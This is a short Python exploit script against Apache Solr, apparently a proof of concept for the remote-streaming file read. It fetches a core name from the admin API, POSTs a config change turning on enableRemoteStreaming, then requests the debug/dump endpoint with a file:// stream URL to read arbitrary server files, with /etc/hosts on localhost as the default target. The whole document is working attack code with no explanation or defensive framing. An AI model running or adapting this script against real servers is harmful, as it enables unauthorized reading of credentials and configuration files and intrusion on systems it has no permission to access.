import requests,json

# ssrf
# file read
def attack(host,filename):
    url1 = "http://{}/solr/admin/cores?indexInfo=false&wt=json".format(host)
    j = json.loads(requests.get(url1).text)
    dbname = j.get("status").get("demo").get("name")

    url2 = "http://{}/solr/{}/config".format(host,dbname)
    payload = "{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}"
    headers = {
        'Content-Type': 'application/json'
    }
    response = requests.request("POST", url2, headers=headers, data=payload)
    url3 = "http://{}/solr/{}/debug/dump?param=ContentStreams&stream.url=file://{}".format(host,dbname,filename)
    resp = requests.get(url3)
    try:
        txt = json.loads(resp.text).get("streams")[0].get("stream")
        return txt
    except:
        return "fail"

if __name__ == '__main__':
    print(attack("localhost:8983","/etc/hosts"))


